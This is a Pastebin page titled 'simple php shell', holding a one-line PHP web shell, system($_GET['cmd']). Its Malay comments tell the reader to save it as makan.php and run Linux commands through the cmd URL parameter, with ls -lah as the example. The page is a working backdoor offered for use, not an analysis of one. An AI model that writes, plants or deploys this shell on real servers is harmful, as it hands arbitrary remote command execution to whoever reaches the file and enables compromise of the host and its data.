Advertisement
ak47suk1

simple php shell

Mar 23rd, 2011
516
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.20 KB | None | 0 0
  1. /*
  2.  
  3. Save sebagai makan.php
  4.  
  5. nak akses. http://localhost/makan.php?cmd= <command linux>
  6.  
  7. contoh
  8.  
  9.  
  10. http://localhost/makan.php?cmd=ls -lah
  11.  
  12. Selamat mencuba.
  13.  
  14.  
  15. */
  16.  
  17. <?php system($_GET['cmd']); ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement